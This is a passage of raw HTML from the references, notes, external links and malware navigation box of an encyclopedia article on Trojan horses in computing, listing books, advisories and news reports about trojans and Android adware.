href="mw-data:TemplateStyles:r1238218222"><cite id="CITEREFDatta2014" class="citation web cs1">Datta, Ganesh (August 7, 2014). <a rel="nofollow" class="external text" href="https://archive.today/20140812015643/http://securaid.com/windows/2014/08/what-are-trojans/">"What are Trojans?"</a>. <i>SecurAid</i>. Archived from <a rel="nofollow" class="external text" href="http://securaid.com/windows/2014/08/what-are-trojans/">the original</a> on August 12, 2014<span class="reference-accessdate">. Retrieved <span class="nowrap">March 27,</span> 2020</span>.</cite><span title="ctx_ver=Z39.88-2004&amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;rft.genre=unknown&amp;rft.jtitle=SecurAid&amp;rft.atitle=What+are+Trojans%3F&amp;rft.date=2014-08-07&amp;rft.aulast=Datta&amp;rft.aufirst=Ganesh&amp;rft_id=http%3A%2F%2Fsecuraid.com%2Fwindows%2F2014%2F08%2Fwhat-are-trojans%2F&amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3ATrojan+horse+%28computing%29" class="Z3988"></span></span> </li> <li id="cite_note-16"><span class="mw-cite-backlink"><b><a href="#cite_ref-16">^</a></b></span> <span class="reference-text"><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1238218222"><cite id="CITEREFKanakerKarimAwwadIsmail2022" class="citation journal cs1">Kanaker, Hasan; Karim, Nader Abdel; Awwad, Samer A. B.; Ismail, Nurul H. A.; Zraqou, Jamal; Ali, Abdulla M. F. Al (December 20, 2022). <a rel="nofollow" class="external text" href="https://online-journals.org/index.php/i-jim/article/view/35763">"Trojan Horse Infection Detection in Cloud Based Environment Using Machine Learning"</a>. <i>International Journal of Interactive Mobile Technologies</i>. <b>16</b> (24): 81–106. <a href="/wiki/Doi_(identifier)" class="mw-redirect" title="Doi (identifier)">doi</a>:<span class="id-lock-free" title="Freely accessible"><a rel="nofollow" class="external text" href="https://doi.org/10.3991%2Fijim.v16i24.35763">10.3991/ijim.v16i24.35763</a></span>. <a href="/wiki/ISSN_(identifier)" class="mw-redirect" title="ISSN (identifier)">ISSN</a>&#160;<a rel="nofollow" class="external text" href="https://search.worldcat.org/issn/1865-7923">1865-7923</a>.</cite><span title="ctx_ver=Z39.88-2004&amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;rft.genre=article&amp;rft.jtitle=International+Journal+of+Interactive+Mobile+Technologies&amp;rft.atitle=Trojan+Horse+Infection+Detection+in+Cloud+Based+Environment+Using+Machine+Learning&amp;rft.volume=16&amp;rft.issue=24&amp;rft.pages=81-106&amp;rft.date=2022-12-20&amp;rft_id=info%3Adoi%2F10.3991%2Fijim.v16i24.35763&amp;rft.issn=1865-7923&amp;rft.aulast=Kanaker&amp;rft.aufirst=Hasan&amp;rft.au=Karim%2C+Nader+Abdel&amp;rft.au=Awwad%2C+Samer+A.+B.&amp;rft.au=Ismail%2C+Nurul+H.+A.&amp;rft.au=Zraqou%2C+Jamal&amp;rft.au=Ali%2C+Abdulla+M.+F.+Al&amp;rft_id=https%3A%2F%2Fonline-journals.org%2Findex.php%2Fi-jim%2Farticle%2Fview%2F35763&amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3ATrojan+horse+%28computing%29" class="Z3988"></span></span> </li> <li id="cite_note-uss_42-17"><span class="mw-cite-backlink"><b><a href="#cite_ref-uss_42_17-0">^</a></b></span> <span class="reference-text"><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1238218222"><cite id="CITEREFWoodKochan1985" class="citation book cs1">Wood, Patrick H.; Kochan, Stephen G. (1985). <i>UNIX System Security</i>. Hayden Books. p.&#160;42. <a href="/wiki/ISBN_(identifier)" class="mw-redirect" title="ISBN (identifier)">ISBN</a>&#160;<a href="/wiki/Special:BookSources/0-8104-6267-2" title="Special:BookSources/0-8104-6267-2"><bdi>0-8104-6267-2</bdi></a>.</cite><span title="ctx_ver=Z39.88-2004&amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;rft.genre=book&amp;rft.btitle=UNIX+System+Security&amp;rft.pages=42&amp;rft.pub=Hayden+Books&amp;rft.date=1985&amp;rft.isbn=0-8104-6267-2&amp;rft.aulast=Wood&amp;rft.aufirst=Patrick+H.&amp;rft.au=Kochan%2C+Stephen+G.&amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3ATrojan+horse+%28computing%29" class="Z3988"></span></span> </li> <li id="cite_note-uss_43-18"><span class="mw-cite-backlink"><b><a href="#cite_ref-uss_43_18-0">^</a></b></span> <span class="reference-text"><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1238218222"><cite id="CITEREFWoodKochan1985" class="citation book cs1">Wood, Patrick H.; Kochan, Stephen G. (1985). <i>UNIX System Security</i>. Hayden Books. p.&#160;43. <a href="/wiki/ISBN_(identifier)" class="mw-redirect" title="ISBN (identifier)">ISBN</a>&#160;<a href="/wiki/Special:BookSources/0-8104-6267-2" title="Special:BookSources/0-8104-6267-2"><bdi>0-8104-6267-2</bdi></a>. <q>The above Trojan horse works only if a user's PATH is set to search the current directory for commands before searching the system's directories.</q></cite><span title="ctx_ver=Z39.88-2004&amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;rft.genre=book&amp;rft.btitle=UNIX+System+Security&amp;rft.pages=43&amp;rft.pub=Hayden+Books&amp;rft.date=1985&amp;rft.isbn=0-8104-6267-2&amp;rft.aulast=Wood&amp;rft.aufirst=Patrick+H.&amp;rft.au=Kochan%2C+Stephen+G.&amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3ATrojan+horse+%28computing%29" class="Z3988"></span></span> </li> <li id="cite_note-19"><span class="mw-cite-backlink"><b><a href="#cite_ref-19">^</a></b></span> <span class="reference-text"><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1238218222"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://cets.seas.upenn.edu/answers/dot-path.html">"What's wrong with having '.' in your $PATH?"</a>. Penn Engineering<span class="reference-accessdate">. Retrieved <span class="nowrap">November 28,</span> 2023</span>. <q>[I]f you're a clumsy typist and some day type "sl -l" instead of "ls -l", you run the risk of running "./sl", if there is one. Some "clever" programmer could anticipate common typing mistakes and leave programs by those names scattered throughout public directories. Beware.</q></cite><span title="ctx_ver=Z39.88-2004&amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;rft.genre=unknown&amp;rft.btitle=What%27s+wrong+with+having+%27.%27+in+your+%24PATH%3F&amp;rft.pub=Penn+Engineering&amp;rft_id=https%3A%2F%2Fcets.seas.upenn.edu%2Fanswers%2Fdot-path.html&amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3ATrojan+horse+%28computing%29" class="Z3988"></span></span> </li> <li id="cite_note-21"><span class="mw-cite-backlink"><b><a href="#cite_ref-21">^</a></b></span> <span class="reference-text"><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1238218222"><cite id="CITEREFSeth1998" class="citation report cs1">Seth, Kulakow (1998). <a rel="nofollow" class="external text" href="https://www.sans.org/reading-room/whitepapers/malicious/netbus-21-trojan-horse-actual-valid-remote-control-administration-tool-103">"Is it still a Trojan horse or an Actual Valid Remote Control Administration Tool?"</a> (Report). <a href="/wiki/SANS_Institute" title="SANS Institute">SANS Institute</a><span class="reference-accessdate">. Retrieved <span class="nowrap">May 10,</span> 2021</span>.</cite><span title="ctx_ver=Z39.88-2004&amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;rft.genre=report&amp;rft.btitle=%22Is+it+still+a+Trojan+horse+or+an+Actual+Valid+Remote+Control+Administration+Tool%3F%22&amp;rft.pub=SANS+Institute&amp;rft.date=1998&amp;rft.aulast=Seth&amp;rft.aufirst=Kulakow&amp;rft_id=https%3A%2F%2Fwww.sans.org%2Freading-room%2Fwhitepapers%2Fmalicious%2Fnetbus-21-trojan-horse-actual-valid-remote-control-administration-tool-103&amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3ATrojan+horse+%28computing%29" class="Z3988"></span></span> </li> <li id="cite_note-22"><span class="mw-cite-backlink"><b><a href="#cite_ref-22">^</a></b></span> <span class="reference-text"><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1238218222"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://sourceforge.net/projects/mega-panzer/">"Mega-Panzer"</a>. <i>SourceForge</i>. September 21, 2016.</cite><span title="ctx_ver=Z39.88-2004&amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;rft.genre=unknown&amp;rft.jtitle=SourceForge&amp;rft.atitle=Mega-Panzer&amp;rft.date=2016-09-21&amp;rft_id=https%3A%2F%2Fsourceforge.net%2Fprojects%2Fmega-panzer%2F&amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3ATrojan+horse+%28computing%29" class="Z3988"></span></span> </li> <li id="cite_note-23"><span class="mw-cite-backlink"><b><a href="#cite_ref-23">^</a></b></span> <span class="reference-text"><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1238218222"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://sourceforge.net/projects/mini-panzer/">"Mini-Panzer"</a>. <i>SourceForge</i>. September 18, 2016.</cite><span title="ctx_ver=Z39.88-2004&amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;rft.genre=unknown&amp;rft.jtitle=SourceForge&amp;rft.atitle=Mini-Panzer&amp;rft.date=2016-09-18&amp;rft_id=https%3A%2F%2Fsourceforge.net%2Fprojects%2Fmini-panzer%2F&amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3ATrojan+horse+%28computing%29" class="Z3988"></span></span> </li> <li id="cite_note-24"><span class="mw-cite-backlink"><b><a href="#cite_ref-24">^</a></b></span> <span class="reference-text"><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1238218222"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://www.indiatoday.in/amp/information/story/what-is-sova-virus-2001017-2022-09-16">"What is Sova virus?"</a>. <i>India Today</i>. September 16, 2022.</cite><span title="ctx_ver=Z39.88-2004&amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;rft.genre=unknown&amp;rft.jtitle=India+Today&amp;rft.atitle=What+is+Sova+virus%3F&amp;rft.date=2022-09-16&amp;rft_id=https%3A%2F%2Fwww.indiatoday.in%2Famp%2Finformation%2Fstory%2Fwhat-is-sova-virus-2001017-2022-09-16&amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3ATrojan+horse+%28computing%29" class="Z3988"></span></span> </li> <li id="cite_note-25"><span class="mw-cite-backlink"><b><a href="#cite_ref-25">^</a></b></span> <span class="reference-text"><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1238218222"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://blog.lookout.com/blog/2015/11/19/shedun-trojanized-adware/">"Trojanized adware family abuses accessibility service to install whatever apps it wants – Lookout Blog"</a>.</cite><span title="ctx_ver=Z39.88-2004&amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;rft.genre=unknown&amp;rft.btitle=Trojanized+adware+family+abuses+accessibility+service+to+install+whatever+apps+it+wants+%E2%80%93+Lookout+Blog&amp;rft_id=https%3A%2F%2Fblog.lookout.com%2Fblog%2F2015%2F11%2F19%2Fshedun-trojanized-adware%2F&amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3ATrojan+horse+%28computing%29" class="Z3988"></span></span> </li> <li id="cite_note-26"><span class="mw-cite-backlink"><b><a href="#cite_ref-26">^</a></b></span> <span class="reference-text"><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1238218222"><cite id="CITEREFNeal2015" class="citation web cs1">Neal, Dave (November 20, 2015). <a rel="nofollow" class="external text" href="https://web.archive.org/web/20151122002729/http://www.theinquirer.net/inquirer/news/2435721/shedun-trojan-adware-is-hitting-the-android-accessibility-service">"Shedun trojan adware is hitting the Android Accessibility Service"</a>. <i><a href="/wiki/The_Inquirer" title="The Inquirer">The Inquirer</a></i>. Incisive Business Media. Archived from the original on November 22, 2015<span class="reference-accessdate">. Retrieved <span class="nowrap">March 27,</span> 2020</span>.</cite><span title="ctx_ver=Z39.88-2004&amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;rft.genre=unknown&amp;rft.jtitle=The+Inquirer&amp;rft.atitle=Shedun+trojan+adware+is+hitting+the+Android+Accessibility+Service&amp;rft.date=2015-11-20&amp;rft.aulast=Neal&amp;rft.aufirst=Dave&amp;rft_id=http%3A%2F%2Fwww.theinquirer.net%2Finquirer%2Fnews%2F2435721%2Fshedun-trojan-adware-is-hitting-the-android-accessibility-service&amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3ATrojan+horse+%28computing%29" class="Z3988"></span><span class="cs1-maint citation-comment"><code class="cs1-code">{{<a href="/wiki/Template:Cite_web" title="Template:Cite web">cite web</a>}}</code>: CS1 maint: unfit URL (<a href="/wiki/Category:CS1_maint:_unfit_URL" title="Category:CS1 maint: unfit URL">link</a>)</span></span> </li> <li id="cite_note-27"><span class="mw-cite-backlink"><b><a href="#cite_ref-27">^</a></b></span> <span class="reference-text"><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1238218222"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://blog.lookout.com/blog/2015/11/04/trojanized-adware/">"Lookout discovers new trojanized adware; 20K popular apps caught in the crossfire – Lookout Blog"</a>.</cite><span title="ctx_ver=Z39.88-2004&amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;rft.genre=unknown&amp;rft.btitle=Lookout+discovers+new+trojanized+adware%3B+20K+popular+apps+caught+in+the+crossfire+%E2%80%93+Lookout+Blog&amp;rft_id=https%3A%2F%2Fblog.lookout.com%2Fblog%2F2015%2F11%2F04%2Ftrojanized-adware%2F&amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3ATrojan+horse+%28computing%29" class="Z3988"></span></span> </li> <li id="cite_note-28"><span class="mw-cite-backlink"><b><a href="#cite_ref-28">^</a></b></span> <span class="reference-text"><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1238218222"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://betanews.com/2015/11/05/shuanet-shiftybug-and-shedun-malware-could-auto-root-your-android/">"Shuanet, ShiftyBug and Shedun malware could auto-root your Android"</a>. November 5, 2015.</cite><span title="ctx_ver=Z39.88-2004&amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;rft.genre=unknown&amp;rft.btitle=Shuanet%2C+ShiftyBug+and+Shedun+malware+could+auto-root+your+Android&amp;rft.date=2015-11-05&amp;rft_id=https%3A%2F%2Fbetanews.com%2F2015%2F11%2F05%2Fshuanet-shiftybug-and-shedun-malware-could-auto-root-your-android%2F&amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3ATrojan+horse+%28computing%29" class="Z3988"></span></span> </li> <li id="cite_note-29"><span class="mw-cite-backlink"><b><a href="#cite_ref-29">^</a></b></span> <span class="reference-text"><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1238218222"><cite id="CITEREFTimes2015" class="citation web cs1">Times, Tech (November 9, 2015). <a rel="nofollow" class="external text" href="http://www.techtimes.com/articles/104373/20151109/new-family-of-android-malware-virtually-impossible-to-remove-say-hello-to-shedun-shuanet-and-shiftybug.htm">"New Family of Android Malware Virtually Impossible To Remove: Say Hello To Shedun, Shuanet And ShiftyBug"</a>.</cite><span title="ctx_ver=Z39.88-2004&amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;rft.genre=unknown&amp;rft.btitle=New+Family+of+Android+Malware+Virtually+Impossible+To+Remove%3A+Say+Hello+To+Shedun%2C+Shuanet+And+ShiftyBug&amp;rft.date=2015-11-09&amp;rft.aulast=Times&amp;rft.aufirst=Tech&amp;rft_id=http%3A%2F%2Fwww.techtimes.com%2Farticles%2F104373%2F20151109%2Fnew-family-of-android-malware-virtually-impossible-to-remove-say-hello-to-shedun-shuanet-and-shiftybug.htm&amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3ATrojan+horse+%28computing%29" class="Z3988"></span></span> </li> <li id="cite_note-30"><span class="mw-cite-backlink"><b><a href="#cite_ref-30">^</a></b></span> <span class="reference-text"><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1238218222"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://arstechnica.com/security/2015/11/android-adware-can-install-itself-even-when-users-explicitly-reject-it/">"Android adware can install itself even when users explicitly reject it"</a>. November 19, 2015.</cite><span title="ctx_ver=Z39.88-2004&amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;rft.genre=unknown&amp;rft.btitle=Android+adware+can+install+itself+even+when+users+explicitly+reject+it&amp;rft.date=2015-11-19&amp;rft_id=https%3A%2F%2Farstechnica.com%2Fsecurity%2F2015%2F11%2Fandroid-adware-can-install-itself-even-when-users-explicitly-reject-it%2F&amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3ATrojan+horse+%28computing%29" class="Z3988"></span></span> </li> <li id="cite_note-31"><span class="mw-cite-backlink"><b><a href="#cite_ref-31">^</a></b></span> <span class="reference-text"><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1238218222"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://www.collinsdictionary.com/dictionary/english/trojan">"trojan"</a>. <i>Collins Advanced Dictionary</i><span class="reference-accessdate">. Retrieved <span class="nowrap">March 29,</span> 2020</span>.</cite><span title="ctx_ver=Z39.88-2004&amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;rft.genre=unknown&amp;rft.jtitle=Collins+Advanced+Dictionary&amp;rft.atitle=trojan&amp;rft_id=https%3A%2F%2Fwww.collinsdictionary.com%2Fdictionary%2Fenglish%2Ftrojan&amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3ATrojan+horse+%28computing%29" class="Z3988"></span></span> </li> <li id="cite_note-32"><span class="mw-cite-backlink"><b><a href="#cite_ref-32">^</a></b></span> <span class="reference-text"><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1238218222"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://docs.microsoft.com/en-us/style-guide/a-z-word-list-term-collections/t/trojan-horse-trojan">"trojan horse"</a>. <i>Microsoft Style Guide</i>. Microsoft<span class="reference-accessdate">. Retrieved <span class="nowrap">March 29,</span> 2020</span>.</cite><span title="ctx_ver=Z39.88-2004&amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;rft.genre=unknown&amp;rft.jtitle=Microsoft+Style+Guide&amp;rft.atitle=trojan+horse&amp;rft_id=https%3A%2F%2Fdocs.microsoft.com%2Fen-us%2Fstyle-guide%2Fa-z-word-list-term-collections%2Ft%2Ftrojan-horse-trojan&amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3ATrojan+horse+%28computing%29" class="Z3988"></span></span> </li> </ol></div></div> <div class="mw-heading mw-heading2"><h2 id="Notes">Notes</h2><span class="mw-editsection"><span class="mw-editsection-bracket">[</span><a href="/w/index.php?title=Trojan_horse_(computing)&amp;action=edit&amp;section=12" title="Edit section: Notes"><span>edit</span></a><span class="mw-editsection-bracket">]</span></span></div> <link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1239543626"><div class="reflist reflist-lower-alpha"> <div class="mw-references-wrap"><ol class="references"> <li id="cite_note-20"><span class="mw-cite-backlink"><b><a href="#cite_ref-20">^</a></b></span> <span class="reference-text">Place the <code>alias</code> statement in <a href="/wiki/Unix_shell#Configuration_files" title="Unix shell">/etc/profile</a></span> </li> </ol></div></div> <div class="mw-heading mw-heading2"><h2 id="External_links">External links</h2><span class="mw-editsection"><span class="mw-editsection-bracket">[</span><a href="/w/index.php?title=Trojan_horse_(computing)&amp;action=edit&amp;section=13" title="Edit section: External links"><span>edit</span></a><span class="mw-editsection-bracket">]</span></span></div> <ul><li><span class="noviewer" typeof="mw:File"><a href="/wiki/File:Commons-logo.svg" class="mw-file-description"><img alt="" src="//upload.wikimedia.org/wikipedia/en/thumb/4/4a/Commons-logo.svg/12px-Commons-logo.svg.png" decoding="async" width="12" height="16" class="mw-file-element" srcset="//upload.wikimedia.org/wikipedia/en/thumb/4/4a/Commons-logo.svg/18px-Commons-logo.svg.png 1.5x, //upload.wikimedia.org/wikipedia/en/thumb/4/4a/Commons-logo.svg/24px-Commons-logo.svg.png 2x" data-file-width="1024" data-file-height="1376" /></a></span> Media related to <a href="https://commons.wikimedia.org/wiki/Category:Trojan_horse_(malware)" class="extiw" title="commons:Category:Trojan horse (malware)">Trojan horse (malware)</a> at Wikimedia Commons</li> <li><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1238218222"><cite class="citation web cs1"><a rel="nofollow" class="external text" href="https://resources.sei.cmu.edu/asset_files/WhitePaper/1999_019_001_496184.pdf#page=14">"CERT Advisory CA-1999-02 Trojan Horses"</a> <span class="cs1-format">(PDF)</span>. <i>Carnegie Mellon University Software Engineering Institute</i>. <a rel="nofollow" class="external text" href="https://web.archive.org/web/20001017172300/http://www.cert.org/advisories/CA-1999-02.html">Archived</a> from the original on October 17, 2000<span class="reference-accessdate">. Retrieved <span class="nowrap">September 15,</span> 2019</span>.</cite><span title="ctx_ver=Z39.88-2004&amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;rft.genre=unknown&amp;rft.jtitle=Carnegie+Mellon+University+Software+Engineering+Institute&amp;rft.atitle=CERT+Advisory+CA-1999-02+Trojan+Horses&amp;rft_id=https%3A%2F%2Fresources.sei.cmu.edu%2Fasset_files%2FWhitePaper%2F1999_019_001_496184.pdf%23page%3D14&amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3ATrojan+horse+%28computing%29" class="Z3988"></span></li></ul> <div class="navbox-styles"><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1129693374"><style data-mw-deduplicate="TemplateStyles:r1236075235">.mw-parser-output .navbox{box-sizing:border-box;border:1px solid #a2a9b1;width:100%;clear:both;font-size:88%;text-align:center;padding:1px;margin:1em auto 0}.mw-parser-output .navbox .navbox{margin-top:0}.mw-parser-output .navbox+.navbox,.mw-parser-output .navbox+.navbox-styles+.navbox{margin-top:-1px}.mw-parser-output .navbox-inner,.mw-parser-output .navbox-subgroup{width:100%}.mw-parser-output .navbox-group,.mw-parser-output .navbox-title,.mw-parser-output .navbox-abovebelow{padding:0.25em 1em;line-height:1.5em;text-align:center}.mw-parser-output .navbox-group{white-space:nowrap;text-align:right}.mw-parser-output .navbox,.mw-parser-output .navbox-subgroup{background-color:#fdfdfd}.mw-parser-output .navbox-list{line-height:1.5em;border-color:#fdfdfd}.mw-parser-output .navbox-list-with-group{text-align:left;border-left-width:2px;border-left-style:solid}.mw-parser-output tr+tr>.navbox-abovebelow,.mw-parser-output tr+tr>.navbox-group,.mw-parser-output tr+tr>.navbox-image,.mw-parser-output tr+tr>.navbox-list{border-top:2px solid #fdfdfd}.mw-parser-output .navbox-title{background-color:#ccf}.mw-parser-output .navbox-abovebelow,.mw-parser-output .navbox-group,.mw-parser-output .navbox-subgroup .navbox-title{background-color:#ddf}.mw-parser-output .navbox-subgroup .navbox-group,.mw-parser-output .navbox-subgroup .navbox-abovebelow{background-color:#e6e6ff}.mw-parser-output .navbox-even{background-color:#f7f7f7}.mw-parser-output .navbox-odd{background-color:transparent}.mw-parser-output .navbox .hlist td dl,.mw-parser-output .navbox .hlist td ol,.mw-parser-output .navbox .hlist td ul,.mw-parser-output .navbox td.hlist dl,.mw-parser-output .navbox td.hlist ol,.mw-parser-output .navbox td.hlist ul{padding:0.125em 0}.mw-parser-output .navbox .navbar{display:block;font-size:100%}.mw-parser-output .navbox-title .navbar{float:left;text-align:left;margin-right:0.5em}body.skin--responsive .mw-parser-output .navbox-image img{max-width:none!important}@media print{body.ns-0 .mw-parser-output .navbox{display:none!important}}</style></div><div role="navigation" class="navbox" aria-labelledby="Malware_topics" style="padding:3px"><table class="nowraplinks mw-collapsible autocollapse navbox-inner" style="border-spacing:0;background:transparent;color:inherit"><tbody><tr><th scope="col" class="navbox-title" colspan="2"><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1129693374"><link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r1239400231"><div class="navbar plainlinks hlist navbar-mini"><ul><li class="nv-view"><a href="/wiki/Template:Malware" title="Template:Malware"><abbr title="View this template">v</abbr></a></li><li class="nv-talk"><a href="/wiki/Template_talk:Malware" title="Template talk:Malware"><abbr title="Discuss this template">t</abbr></a></li><li class="nv-edit"><a href="/wiki/Special:EditPage/Template:Malware" title="Special:EditPage/Template:Malware"><abbr title="Edit this template">e</abbr></a></li></ul></div><div id="Malware_topics" style="font-size:114%;margin:0 4em"><a href="/wiki/Malware" title="Malware">Malware</a> topics</div></th></tr><tr><th scope="row" class="navbox-group" style="width:1%">Infectious malware</th><td class="navbox-list-with-group navbox-list navbox-odd hlist" style="width:100%;padding:0"><div style="padding:0 0.25em"> <ul><li><a href="/wiki/Comparison_of_computer_viruses" title="Comparison of computer viruses">Comparison of computer viruses</a></li> <li><a href="/wiki/Computer_virus" title="Computer virus">Computer virus</a></li> <li><a href="/wiki/Computer_worm" title="Computer worm">Computer worm</a></li> <li><a href="/wiki/List_of_computer_worms" title="List of computer worms">List of computer worms</a></li> <li><a href="/wiki/Timeline_of_computer_viruses_and_worms" title="Timeline of computer viruses and worms">Timeline of computer viruses and worms</a></li></ul> </div></td></tr><tr><th scope="row" class="navbox-group" style="width:1%">Concealment</th><td class="navbox-list-with-group navbox-list navbox-even hlist" style="width:100%;padding:0"><div style="padding:0 0.25em"> <ul><li><a href="/wiki/Backdoor_(computing)" title="Backdoor (computing)">Backdoor</a></li> <li><a href="/wiki/Clickjacking" title="Clickjacking">Clickjacking</a></li> <li><a href="/wiki/Man-in-the-browser" title="Man-in-the-browser">Man-in-the-browser</a></li> <li><a href="/wiki/Man-in-the-middle_attack" title="Man-in-the-middle attack">Man-in-the-middle</a></li> <li><a href="/wiki/Rootkit" title="Rootkit">Rootkit</a></li> <li><a class="mw-selflink selflink">Trojan horse</a></li> <li><a href="/wiki/Zombie_(computing)" title="Zombie (computing)">Zombie computer</a></li></ul> </div></td></tr><tr><th scope="row" class="navbox-group" style="width:1%">Malware for profit</th><td class="navbox-list-with-group navbox-list navbox-odd hlist" style="width:100%;padding:0"><div style="padding:0 0.25em"> <ul><li><a href="/wiki/Adware" title="Adware">Adware</a></li> <li><a href="/wiki/Botnet" title="Botnet">Botnet</a></li> <li><a href="/wiki/Crimeware" title="Crimeware">Crimeware</a></li> <li><a href="/wiki/Fleeceware" title="Fleeceware">Fleeceware</a></li> <li><a href="/wiki/Form_grabbing" title="Form grabbing">Form grabbing</a></li> <li><a href="/wiki/Dialer#Fraudulent_dialer" title="Dialer">Fraudulent dialer</a></li> <li><a href="/wiki/Infostealer" title="Infostealer">Infostealer</a></li> <li><a href="/wiki/Keystroke_logging" title="Keystroke logging">Keystroke logging</a></li> <li><a href="/wiki/Internet_bot#Malicious_purposes" title="Internet bot">Malbot</a></li> <li><a href="/wiki/Privacy-invasive_software" title="Privacy-invasive software">Privacy-invasive software</a></li> <li><a href="/wiki/Ransomware" title="Ransomware">Ransomware</a></li> <li><a href="/wiki/Rogue_security_software" title="Rogue security software">Rogue security software</a></li> <li><a href="/wiki/Scareware" title="Scareware">Scareware</a></li> <li><a href="/wiki/Spyware" title="Spyware">Spyware</a></li> <li><a href="/wiki/Web_threat" title="Web threat">Web threats</a></li></ul> </div></td></tr><tr><th scope="row" class="navbox-group" style="width:1%">By operating system</th><td class="navbox-list-with-group navbox-list navbox-even hlist" style="width:100%;padding:0"><div style="padding:0 0.25em"> <ul><li><a href="/wiki/Category:Android_(operating_system)_malware" title="Category:Android (operating system) malware">Android malware</a></li> <li><a href="/wiki/Category:Classic_Mac_OS_viruses" title="Category:Classic Mac OS viruses">Classic Mac OS viruses</a></li> <li><a href="/wiki/Category:IOS_malware" title="Category:IOS malware">iOS malware</a></li> <li><a href="/wiki/Linux_malware" title="Linux malware">Linux malware</a></li> <li><a href="/wiki/Category:MacOS_malware" title="Category:MacOS malware">MacOS malware</a></li> <li><a href="/wiki/Macro_virus" title="Macro virus">Macro virus</a></li> <li><a href="/wiki/Mobile_malware" title="Mobile malware">Mobile malware</a></li> <li><a href="/wiki/Palm_OS_viruses" title="Palm OS viruses">Palm OS viruses</a></li> <li><a href="/wiki/HyperCard_viruses" class="mw-redirect" title="HyperCard viruses">HyperCard viruses</a></li></ul> </div></td></tr><tr><th scope="row" class="navbox-group" style="width:1%">Protection</th><td class="navbox-list-with-group navbox-list navbox-odd hlist" style="width:100%;padding:0"><div style="padding:0 0.25em"> <ul><li><a href="/wiki/Anti-keylogger" title="Anti-keylogger">Anti-keylogger</a></li> <li><a href="/wiki/Antivirus_software" title="Antivirus software">Antivirus software</a></li> <li><a href="/wiki/Browser_security" title="Browser security">Browser security</a></li> <li><a href="/wiki/Data_loss_prevention_software" title="Data loss prevention software">Data loss prevention software</a></li> <li><a href="/wiki/Defensive_computing" title="Defensive computing">Defensive computing</a></li> <li><a href="/wiki/Firewall_(computing)" title="Firewall (computing)">Firewall</a></li> <li><a href="/wiki/Internet_security" title="Internet security">Internet 